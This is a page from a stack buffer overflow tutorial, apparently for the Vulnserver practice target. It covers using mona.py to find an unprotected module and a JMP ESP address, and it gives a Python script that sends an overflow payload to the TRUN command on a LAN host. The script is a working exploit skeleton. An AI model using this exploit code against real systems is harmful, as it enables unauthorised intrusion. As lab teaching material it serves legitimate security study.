Finding RIGHT Module

PRACTICE ! PRACTICE ! PRACTICE !

Finding the apt module refers to finding some kind of dll's within the program which has NO MEMORY PROTECTIONS such as DEP - ASLR - SAFE SEH etc

Do download the mona.py and place it in the Debugger PyCommand's location

To interact with the mona module we'll have to use the command

!mona modules

So there is a module called essfunc.dll whose memory protections are all set to FALSE
Now the last thing to do is find an opcode equivalent to JMP - To do that !

$ /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm> JMP ESP
FFE4

So now lets use the mona module to find the assembly opcode FFE4 by using the command

!mona find -s "\xff\xe4" -m essfunc.dll

Let's try out the first RET address, which is 0x625011af

Now let's write our python script automate this

#!/usr/bin/python

import sys, socket

shellcode = "A" * 2003 + "\xaf\x11\x50\x62"	# Writing this in reverse because of the x86 arch little endian mapping

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('192.168.0.104',9999))

	s.send(('TRUN /.:/' + shellcode))
	s.close()

except:

	print("Error !")
	sys.exit()

Before executing the script make sure to set a breakpoint on the JMP code (625011af)

F2 will set a breakpoint to the JMP code, now let's run the script !

PreviousFinding BAD Characters NextGenerating Shellcode

Last updated 1 year ago